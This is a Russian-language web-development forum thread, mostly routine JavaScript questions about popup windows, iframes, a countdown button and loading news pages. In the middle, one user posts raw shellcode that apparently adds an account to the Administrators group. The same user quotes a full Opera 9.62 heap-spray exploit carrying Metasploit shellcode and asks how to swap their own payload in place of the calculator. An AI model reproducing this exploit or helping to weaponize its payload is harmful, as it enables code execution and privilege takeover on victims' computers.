Можно на php и куки реализовать Свой вопрос: Как будет выглядеть запуск функции javascriptpenwindow(''); так чтобы в появляющемся окне не было видно адресной строки
<script> window.open("http://rambler.ru","subwindow", "width=100,height=100, left=100, top=200, resizable, scrollbars = yes"); </script> http://vvz.nw.ru/Lessons/JavaScript/Objects/window/window_open.htm
Вопросы такие. Могу ли я читать содержимое дочернего ифрейма, если да, то как? И еще, ситуация такая. Есть один сервис, когда я делаю get-запрос он мне выдает html-код, но не закрывает сокет. Как можно на JS/ajax содержимое загрузить в переменную, при условии, что этот сервис на другом домене?
Можно вообще-то, но это подразумевает использование компонентов ActiveX, которые во многих браузерах запрещены или блокируются антивирусами.
можно, кладем в одну папку fail.txt с любым содержимым, картинку zakat.jpg и такой вот index.html: Code: <html> <head> <title>Дополнительное окно с кнопкой ОТКРЫТЬ на странице и кнопкой ЗАКРЫТЬ в окне</title> <SCRIPT language="JavaScript"> function openwindow() { windop=window.open("fail.txt","mywindow","menubar=1,resizable=1,width=350,height=250"); windop.document.open(); windop.document.write("<html><head><title>Название странички</title>"); windop.document.write("</head><bоdу bgcolor=#FFFFCC>"); windop.document.write("<center><font face= serif,Arial,Verdana size=3 color=#000000><b>Заголовок текста на страничке</b></font></center>"); windop.document.write("<iframe src='fail.txt'></iframe>"); windop.document.write("<center><form><input type='button' value='Закрыть' onClick='window.close()'></form></center>"); windop.document.write("</bоdу></html>"); windop.document.close(); } </SCRIPT></head> <bоdу> <FORM ACTION="javascript:openwindow()"> <INPUT TYPE=IMAGE SRC="zakat.jpg" HEIGHT=38 WIDTH=62 ALT="Yes" BORDER=0 NAME="Yes" > </form> </bоdу> </html> и переходим в браузере на index.html Появится картинка, нажав на которую мы увидим красивый комментарий к картинке взятый из файла fail.txt Проверено на IE, OPERA и FIREFOX - везде работает Таким вот незамысловатым образом можно замутить галлерею с описанием к каждой картинке
как преобразовать Code: char code[] = "\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3" "\x53\x68\x7e\xd8\xe2\x73\xe8\xbd\x00\x00\x00\x89\x46\x0c\x53\x68" "\x8e\x4e\x0e\xec\xe8\xaf\x00\x00\x00\x89\x46\x08\x31\xdb\x53\x68" "\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\xd0\x89\x46\x04\x89" "\xc3\x53\x68\x5e\xdf\x7c\xcd\xe8\x8c\x00\x00\x00\x89\x46\x10\x53" "\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14\x31\xc0\x31" "\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00\x68\x72\x00" "\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68\x6d\x00\x69" "\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00\x00\x00\x89" "\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50\x53\x50\x51" "\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e\x18\x49\x49" "\x51\x89\xe1\x6a\x01\x51\x6a\x03\xff\x76\x1c\x6a\x00\xff\x56\x14" "\xff\x56\x0c\x56\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c" "\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24\x18" "\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01" "\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38" "\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1" "\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04" "\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00" в Code: var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100"); metasploit shellcodes parser/converter в меня не работает
Такой вот вопрос,мне нужно чтобы на клавише (button) шел таймер обратного отсчета,и только время избегало то автоматически нажималась данная клавиша,как ето можно сделать,и можноли вопше?
Code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Untitled</title> </head> <body> <form action="http://mysite.ru/myfile.php" method="post" name="reg" id="reg"> <div id="login">Логин: <input type="text" name="name"></div> <div id="pass">Пароль: <input type="password" name="pwd"></div> <div><textarea cols="50" rows="20" name="pravila"> Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. Тут текст правил, довольно длинный может быть. </textarea></div> <div id="butons"><input type="button" name="sbm" value="Подождите 15 секунд" onClick="alert('Вам дано 15 секунд для ознакомления с правилами!')" style="color: Gray;"><input type="Reset"></div> </form> <script type="text/javascript"> timeleft = 15; function decrim(){ timeleft -= 1; document.getElementById('butons').innerHTML = '<input type="button" name="sbm" value="Подождите '+timeleft+' секунд" onClick="endtime()" style="color: Gray;"><input type="Reset">'; if(timeleft == 0){ clearInterval(hs) document.getElementById('butons').innerHTML = '<input type="submit" name="sbm" value="ОК"><input type="Reset">'; document.reg.submit(); } } function endtime(){ alert('Вам осталось ждать '+timeleft+' секунд.\nЗаймите это время чтением правил!') } hs = setInterval("decrim()",1000) </script> </body> </html>
Вот этот пакер: http://dean.edwards.name/packer/, только он не предназначен для конвертации шелл-кода. В JS примерно так же будет: Code: var code = '\x66\x81\xec\x80.....'; А уже после можно делать, что угодно - обфусцировать, сжимать, и т.п.
если так писать Code: var code = '\x66\x81\xec\x80.....'; то код не срабатывает, сток много шелкодов на с а как их в html страницу зкинуть
так я и хочу узнать как етот код в експлоит засунуть, вместо запуска калькулятора Code: <html> <head><title>uh?</title></head> <body> <script> // k`sOSe 11/15/2008 // tested on Windows XP SP3, opera 9.62 international version // vulnerability found by send9 // there are many ways to achieve code execution, tons of function pointers to overwrite. // maybe there's one more reliable... var i=0; // push es, pop es var block = unescape("%u0607%u0607"); // metasploit WinExec c:\WINDOWS\system32\calc.exe var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100"); while (block.length < 81920) block += block; var memory = new Array(); for (;i<1000;i++) memory[i] += (block + shellcode); var evil = "file://"; for(var i = 0; i<16438; i++) evil += "X"; evil += "R."; window.location.replace(evil); </script> </body> </html> , шелкод есть но в таком формате Code: \x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3 он не выполняется
используется javascript. есть 10 файлов htm - в каждом одна новость (заголовок и текст). можно ли циклом for вывести их содержимое на одну страницу (получилось только одну вывести)? возможно ли вывести заголовки новостей на другую страницу, при нажатии на которые открывались бы сами новости? интересует возможно ли такое сделать на javascript без php и mysql.